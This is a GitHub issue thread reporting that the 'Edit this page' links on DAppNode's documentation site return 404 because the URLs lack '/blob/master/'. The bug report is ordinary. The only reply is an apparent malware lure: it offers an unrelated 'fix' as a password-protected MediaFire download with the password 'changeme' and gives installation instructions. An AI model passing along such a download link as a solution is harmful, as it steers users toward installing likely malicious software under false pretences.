### ISSUE TITLE
Edit this page button doesn't work

### ISSUE THREAD

**Issue by calumtomeny** [dappnode/DAppNodeDocs#433]
**Describe the bug**

When I'm on a page in the documentation that I would like to edit I click "Edit this page".

**To Reproduce**

1. Go to [here](https://docs.dappnode.io/docs/user/ethical-metrics/troubleshooting)
2. Click "Edit this page"
3. Returns "404 not found"

**Expected behavior**

Returns: https://github.com/dappnode/DappnodeDocs/blob/master/docs/user/ethical-metrics/troubleshooting.md

**Additional context**

It looks like all the links need "/blob/master/" adding after "https://github.com/dappnode/DappnodeDocs/"

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
